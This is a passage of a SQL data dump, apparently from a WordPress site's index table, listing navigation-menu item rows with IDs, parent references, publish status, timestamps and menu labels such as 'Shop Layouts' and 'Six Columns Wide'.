19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1094,NULL,NULL,3279,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1095,NULL,NULL,3280,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1096,NULL,NULL,3281,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1097,NULL,NULL,3282,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1098,NULL,NULL,3283,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1099,NULL,NULL,3284,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1100,NULL,NULL,3285,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1101,NULL,NULL,3286,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1102,NULL,NULL,3287,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1103,NULL,NULL,3288,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1104,NULL,NULL,3289,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1105,NULL,NULL,3290,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1106,NULL,NULL,3291,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1107,NULL,NULL,3292,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1108,NULL,NULL,3293,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1109,NULL,NULL,3294,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1110,NULL,NULL,3295,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1111,NULL,NULL,3296,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1112,NULL,NULL,3297,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1113,NULL,NULL,3298,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1114,NULL,NULL,3299,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1115,NULL,NULL,3300,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1567,NULL,NULL,3744,'post','nav_menu_item',1,0,NULL,NULL,'Shop Layouts','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:32','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1568,NULL,NULL,3745,'post','nav_menu_item',1,0,NULL,NULL,'Shop Pages','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:32','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1569,NULL,NULL,3746,'post','nav_menu_item',1,0,NULL,NULL,'Product Single','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:32','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1570,NULL,NULL,3747,'post','nav_menu_item',1,0,NULL,NULL,'Shop Layouts','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:32','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1122,NULL,NULL,3307,'post','nav_menu_item',1,0,NULL,NULL,'Small Slider','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1123,NULL,NULL,3308,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1124,NULL,NULL,3309,'post','nav_menu_item',1,0,NULL,NULL,'Big Images','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1125,NULL,NULL,3310,'post','nav_menu_item',1,0,NULL,NULL,'Small Images','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1126,NULL,NULL,3311,'post','nav_menu_item',1,0,NULL,NULL,'Big Slider','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1127,NULL,NULL,3312,'post','nav_menu_item',1,0,NULL,NULL,'Small Slider','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1128,NULL,NULL,3313,'post','nav_menu_item',1,0,NULL,NULL,'Big Gallery','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1129,NULL,NULL,3314,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1130,NULL,NULL,3315,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1131,NULL,NULL,3316,'post','nav_menu_item',1,0,NULL,NULL,'Single Types','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1132,NULL,NULL,3317,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1133,NULL,NULL,3318,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1134,NULL,NULL,3319,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1135,NULL,NULL,3320,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1136,NULL,NULL,3321,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1137,NULL,NULL,3322,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1138,NULL,NULL,3323,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1139,NULL,NULL,3324,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1140,NULL,NULL,3325,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1141,NULL,NULL,3326,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1142,NULL,NULL,3327,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1143,NULL,NULL,3328,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1144,NULL,NULL,3329,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1145,NULL,NULL,3330,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1146,NULL,NULL,3331,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1147,NULL,NULL,3332,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1148,NULL,NULL,3333,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1149,NULL,NULL,3334,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1150,NULL,NULL,3335,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1151,NULL,NULL,3336,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1152,NULL,NULL,3337,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1153,NULL,NULL,3338,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1154,NULL,NULL,3339,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1155,NULL,NULL,3340,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1156,NULL,NULL,3341,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1157,NULL,NULL,3342,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1158,NULL,NULL,3343,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1159,NULL,NULL,3344,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1160,NULL,NULL,3345,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1161,NULL,NULL,3346,'post','nav_menu_item',1,3061,NULL,NULL,'Three Columns','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1162,NULL,NULL,3347,'post','nav_menu_item',1,3061,NULL,NULL,'Four Columns Wide','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1163,NULL,NULL,3348,'post','nav_menu_item',1,3061,NULL,NULL,'Four Columns','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:28','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1164,NULL,NULL,3349,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:28','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1165,NULL,NULL,3350,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:28','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1166,NULL,NULL,3351,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:28','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1167,NULL,NULL,3352,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:28','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1168,NULL,NULL,3353,'post','nav_menu_item',1,3061,NULL,NULL,'FIve Columns Wide','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:28','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1169,NULL,NULL,3354,'post','nav_menu_item',1,3061,NULL,NULL,'FIve Columns Wide','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:28','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1170,NULL,NULL,3355,'post','nav_menu_item',1,3061,NULL,NULL,'Six Columns Wide','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:28','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1171,NULL,NULL,3356,'post','nav_menu_item',1,3061,NULL,NULL,'Six Columns Wide','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:28','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1172,NULL,NULL,43,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:57:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1173,NULL,NULL,149,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:57:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1174,NULL,NULL,554,'post','nav_menu_item',1,0,NULL,NULL,'Regala 